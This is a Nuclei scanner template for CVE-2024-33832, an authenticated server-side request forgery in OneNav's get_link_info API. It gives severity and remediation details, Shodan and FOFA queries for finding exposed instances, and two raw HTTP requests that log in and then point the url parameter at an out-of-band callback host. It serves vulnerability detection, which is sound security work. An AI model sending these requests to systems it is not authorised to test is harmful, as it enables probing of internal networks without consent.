id: CVE-2024-33832 info: name: OneNav v0.9.35-20240318 - Server-Side Request Forgery (SSRF) author: ritikchaddha severity: medium description: | OneNav v0.9.35-20240318 is vulnerable to server-side request forgery (SSRF) via the url parameter in the get_link_info API. An attacker can force the server to make arbitrary requests, potentially accessing internal resources. impact: | Authenticated attackers can force the server to make arbitrary requests via the url parameter in the get_link_info API. remediation: | Update OneNav to a version later than v0.9.35-20240318 that patches the SSRF vulnerability. reference: - https://github.com/Hebing123/cve/issues/39 - https://nvd.nist.gov/vuln/detail/CVE-2024-33832 classification: epss-score: 0.03161 epss-percentile: 0.87254 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L cvss-score: 6.5 cve-id: CVE-2024-33832 cwe-id: CWE-918 metadata: max-request: 2 product: onenav fofa-query: icon_hash="1111283449" shodan-query: http.favicon.hash:1111283449 tags: cve,cve2024,ssrf,onenav,oast,authenticated,vuln http: - raw: - | POST /index.php?c=login&check=login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 user={{username}}&password={{password}} - | POST /index.php?c=api&method=get_link_info HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 url=http://{{interactsh-url}} matchers: - type: word part: interactsh_protocol words: - "http" - type: word part: body words: - 'title":' - 'description":' condition: and - type: word part: content_type words: - "application/json" # digest: 4a0a00473045022100e92f843ca22562d576c4c6178b51c89cdc0f8af412dbcbca6b14f1fc587ef4140220037e25541da49f1f1bb3a4b4e60097327dc6c832ac7f994da849be4e19a932ca:922c64590222798bb761d5b6d8e72950